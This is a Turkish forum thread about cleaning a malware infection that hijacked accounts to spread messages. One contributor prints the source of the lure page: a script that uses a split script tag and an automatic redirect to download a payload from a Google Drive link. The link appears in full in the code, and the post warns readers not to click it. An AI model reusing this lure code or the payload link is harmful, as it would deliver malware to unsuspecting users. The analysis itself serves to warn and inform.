Combofix ile tarattım bilgisayarı ama net bağlantısını kestiği için neler sildi bilmiyorum çıkan log kaydınıda akraba silmiş..
Daha sonra yandex ve chrome sildim çünkü ikisininde uzantılar bölümüne girilmiyordu oraya birşeyler ayarlanmıştı sanırsam hatta sildim yükledim durum aynıydı...
En son comodo internet security yükledik tam tarama yaptım combofixden sonra oda 2 tehdit buldu temizledim ve en son mozilla firefox yükledik şimdilik kimseye birşeyler göndermiyor hesap artık..
Gerçekten illet bir virüs bunu yapanların Allah belasını versin diyorum birde ölmüş insanlar üzerinden bunları yürütüyorlar gram vicdan kalmamış..
Araştırdığınız ve bizi bilgilendirdiğiniz için teşekkür ederim..
Verdiğin linkten kaynak koda baktım virüsü buradan çekiyor
Sakın tıklamayın. Nokta koydum zaten. https://....drive.google.com/uc?id=0...C1XbFB2MDB6eVE
Virüsü buraya indiriyor C:\Users\k.adı\Downloads\xxx.tmp şeklinde
Kaynak kodu
<script>
function winatomYonlendirme(){
document.write('Video indirildi, aşağıya tıklayarak izleyebilirsiniz.<scr'+'ipt>setTimeout(function(){location.href="https://drive.google.com/uc?id=0BxiaGDUBRsBDVC1XbFB2MDB6eVE"},500)</scr'+'ipt>')
}
window.onload=winatomYonlendirme;
winatomYonlendirme();
</script>
<style id="jsbin-css">
</style>
<script>
</script>
<script src="http://static.jsbin.com/js/render/edit.js?3.13.24"></script>
<script>jsbinShowEdit({"static":"http://static.jsbin.com","root":"http://jsbin.com","csrf":"6zjGawWV30UoITaRUPaartqG"});</script>
<script>
var _gaq = _gaq || [];
_gaq.push(['_setAccount', 'UA-1656750-34']);
_gaq.push(['_trackPageview']);
(function() {
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
(document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(ga);
})();
</script>